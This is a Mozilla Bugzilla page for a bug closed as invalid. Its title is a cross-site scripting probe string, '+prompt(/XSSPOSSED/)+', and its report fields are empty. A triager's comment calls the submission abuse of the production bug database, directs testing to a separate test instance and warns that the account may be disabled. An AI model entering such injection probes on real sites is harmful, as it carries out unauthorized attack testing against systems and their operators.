Closed
Bug 1271089
Opened 8 years ago
Closed 8 years ago
'+prompt(/XSSPOSSED/)+'
Categories
(Invalid Bugs :: General, defect)
Invalid Bugs
General
Tracking
(Not tracked)
RESOLVED
INVALID
People
(Reporter: Wereforaten1954, Unassigned)
Details
Attachments
(1 file)
5.83 KB,
text/csv
User Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36 OPR/37.0.2178.32
Steps to reproduce:
Actual results:
Expected results:
Comment 1•8 years ago
This is a production bug database used by the Mozilla community to develop Firefox, and other products. It is not a test system or something to play with. Please use http://landfill.bugzilla.org/ if you want to test things. If you continue to abuse bugzilla.mozilla.org your account will be disabled. If you really wanted to report a valid bug in one of Mozilla's applications and services, please read https://developer.mozilla.org/en-US/docs/Mozilla/QA/Bug_writing_guidelines and create a bug report with a way better and more useful description.
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Component: Build Config → General
Product: Thunderbird → Invalid Bugs
Resolution: --- → INVALID
Version: 1.0 → unspecified